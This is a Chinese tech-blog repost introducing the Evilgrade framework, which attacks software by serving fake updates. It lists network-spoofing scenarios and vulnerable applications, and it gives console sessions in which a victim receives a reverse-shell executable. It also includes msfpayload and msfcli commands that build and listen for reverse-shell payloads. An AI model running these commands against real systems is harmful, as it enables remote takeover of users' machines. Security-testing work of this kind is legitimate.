1. 树叶云首页
  2. 技术资讯

如何使用Evilgrade测试应用程序的升级机制是否安全

运维技术资讯

关于Evilgrade

Evilgrade是一款功能强大的模块化框架,该框架允许广大研究人员通过向目标应用程序注入伪造的更新代码,并利用存在安全问题的更新实现机制来测试目标升级更新功能的安全性。该工具提供了预构建的代理以及支持快速测试的默认工作配置。除此之外,该工具还拥有自己的WebServer和DNSServer模块。

工具使用场景

内部场景

1、内部DNS访问;

2、ARP欺骗;

3、DNS缓存投毒;

4、DHCP欺骗;

5、TCP劫持;

6、Wi-Fi访问点伪造;

外部场景

1、内部DNS访问;

2、DNS缓存投毒;

实现的模块

  • Freerip 3.30
  • Jet photo 4.7.2
  • Teamviewer 5.1.9385
  • ISOpen 4.5.0
  • Istat.
  • Gom 2.1.25.5015
  • Atube catcher 1.0.300
  • Vidbox 7.5
  • Ccleaner 2.30.1130
  • Fcleaner 1.2.9.409
  • Allmynotes 1.26
  • Notepad++ 5.8.2
  • Java 1.6.0_22 winxp/win7
  • aMSN 0.98.3
  • Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)
  • Mirc 7.14
  • Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702)
  • Dap 9.5.0.3
  • Winscp 4.2.9
  • AutoIt Script 3.3.6.1
  • Clamwin 0.96.0.1
  • AppTapp Installer 3.11 (Iphone/Itunes)
  • getjar (facebook.com)
  • Google Analytics Javascript injection
  • Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
  • Winamp 5.581
  • TechTracker (cnet) 1.3.1 (Build 55)
  • Nokiasoftware firmware update 2.4.8es
  • Nokia firmware v20.2.011
  • BSplayer 2.53.1034
  • Apt ( < Ubuntu 10.04 LTS)
  • Ubertwitter 4.6 (0.971)
  • Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45
  • Cpan 1.9402
  • VirtualBox (3.2.8 )
  • Express talk
  • Filezilla
  • Flashget
  • Miranda
  • Orbit
  • Photoscape.
  • Panda Antirootkit
  • Skype
  • Sunbelt
  • Superantispyware
  • Trillian <= 5.0.0.26
  • Adium 1.3.10 (Sparkle Framework)
  • VMware

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/infobyte/evilgrade.git

工具使用

下面给出的是工具的帮助信息:

evilgrade>help

Type 'help command' for more detailed help on a command.

  Commands:

    configure -  配置模块名称

    exit      -  退出程序

    help      -  输出工具帮助信息

    reload    -  重新加载并更新所有模块

    restart   -   重启Web服务器

set-  配置变量

    show      - 显示对象信息

    start     -  开启Web服务器

    status    -  获取Web服务器窗台

    stop      -  停止Web服务器

    version   -  显示框架版本



  Object:

     options  -  显示当前模块的选项

     vhosts   -  显示当前模块的VirtualHosts

     modules  -  列举所有可用的模块

     active   -  显示活动模块

列举实现的模块:

evilgrade>show modules



List of modules:

===============



...

...

...



-63 modules available.

配置指定模块:

evilgrade>conf sunjava

evilgrade(sunjava)>

开启服务(DNS服务器和WebServer):

evilgrade>start

evilgrade>

[28/10/2010:21:35:55]-[WEBSERVER]- Webserver ready. Waiting for connections ...

evilgrade>

[28/10/2010:21:35:55]-[DNSSERVER]- DNS Server Ready. Waiting for Connections ...



#### Waiting for victims



evilgrade>

[25/7/2008:4:58:25]-[WEBSERVER]-[modules::sunjava]-[192.168.233.10]- Request:"^/update/[.\\d]+/map\\-[.\\d]+.xml"

evilgrade>

[25/7/2008:4:58:26]-[WEBSERVER]-[modules::sunjava]-[192.168.233.10]- Request:"^/java_update.xml\$"

evilgrade>

[25/7/2008:4:58:39]-[WEBSERVER]-[modules::sunjava]-[192.168.233.10]- Request:".exe"

evilgrade>

[25/7/2008:4:58:40]-[WEBSERVER]-[modules::sunjava]-[192.168.233.10]- Agent sent:"./agent/reverseshell.exe"

显示状态和日志:

evilgrade>show status

Webserver (pid 4134) already running



Users status:

============



.---------------------------------------------------------------------------------------------------------------.

| Client         | Module           | Status | Md5,Cmd,File                                                     |

+----------------+------------------+--------+------------------------------------------------------------------+

|192.168.233.10| modules::sunjava | send   | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe"|

'----------------+------------------+--------+------------------------------------------------------------------'

工具高级使用

使用场景一

evilgrade(sunjava)>set agent '["/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]'

在这种情况下,对于每个所需的更新二进制文件,我们都可以使用 “windows/shell_reverse_tcp”这个Payload来生成伪造的更新代码,同时使用一个反向Shell连接到192.168.233.2:4141。<%OUT%><%OUT>标签专门来检测输出二进制文件的生成位置。

比如说,如果我们运行下列命令:

evilgrade(sunjava)>set agent '["./generatebin -o <%OUT%>/tmp/update".int(rand(256)).".exe<%OUT%>"]'

那么每当我们收到一个二进制请求时,Evilgrade将编译该行并执行最终字符串”./generatebin -o /tmp/update(random).exe”,然后生成不同的代理。

使用场景二

在Evilgrade外运行:

[team@faraday]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 X >/tmp/reverse-shell.exe

在Evilgrade内运行:

evilgrade(sunjava)>set agent /tmp/reverse-shell.exe

生成好Payload之后,我们将得到多个处理器Handler来监听之前分配的LHOST:

[team@faraday]$ msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.100.2 LPORT=4444 E

[*] Started reverse handler on192.168.100.2:4444

[*] Starting the payload handler...

项目地址

Evilgrade:【GitHub传送门】

参考资料

http://www.faradaysec.com/

文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/148788.html<

(0)
运维的头像运维
00
上一篇2025-03-12 07:49
下一篇 2025-03-12 07:50

相关推荐

  • 如何制作个人主题技术资讯

    个人主题怎么制作?

    制作个人主题是一个将个人风格、兴趣或专业领域转化为视觉化或结构化内容的过程,无论是用于个人博客、作品集、社交媒体账号还是品牌形象,核心都是围绕“个人特色”展开,以下从定位、内容规划、视觉设计、技术实现四个维度,详细拆解制作个人主题的完整流程,明确主题定位:找到个人特色的核心主题定位是所有工作的起点,需要先回答……

    运维的头像运维
    2025-11-20
    0
  • 如何管理社群营销技术资讯

    社群营销管理关键是什么?

    社群营销的核心在于通过建立有温度、有价值、有归属感的社群,实现用户留存、转化和品牌传播,其管理需贯穿“目标定位-内容运营-用户互动-数据驱动-风险控制”全流程,以下从五个维度展开详细说明:明确社群定位与目标社群管理的首要任务是精准定位,需明确社群的核心价值(如行业交流、产品使用指导、兴趣分享等)、目标用户画像……

    运维的头像运维
    2025-11-20
    0
  • 香港公司如何网站备案技术资讯

    香港公司网站备案需要什么材料?

    香港公司进行网站备案是一个涉及多部门协调、流程相对严谨的过程,尤其需兼顾中国内地与香港两地的监管要求,由于香港公司注册地与中国内地不同,其网站若主要服务内地用户或使用内地服务器,需根据服务器位置、网站内容性质等,选择对应的备案路径(如工信部ICP备案或公安备案),以下从备案主体资格、流程步骤、材料准备、注意事项……

    运维的头像运维
    2025-11-20
    0
  • 如何企业上云推广技术资讯

    如何企业上云推广

    企业上云已成为数字化转型的核心战略,但推广过程中需结合行业特性、企业痛点与市场需求,构建系统性、多维度的推广体系,以下从市场定位、策略设计、执行落地及效果优化四个维度,详细拆解企业上云推广的实践路径,精准定位:明确目标企业与核心价值企业上云并非“一刀切”的方案,需先锁定目标客户群体,提炼差异化价值主张,客户分层……

    运维的头像运维
    2025-11-20
    0
  • PS如何设计搜索框技术资讯

    PS设计搜索框的实用技巧有哪些?

    在PS中设计一个美观且功能性的搜索框需要结合创意构思、视觉设计和用户体验考量,以下从设计思路、制作步骤、细节优化及交互预览等方面详细说明,帮助打造符合需求的搜索框,设计前的规划明确使用场景:根据网站或APP的整体风格确定搜索框的调性,例如极简风适合细线条和纯色,科技感适合渐变和发光效果,电商类则可能需要突出搜索……

    运维的头像运维
    2025-11-20
    0

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注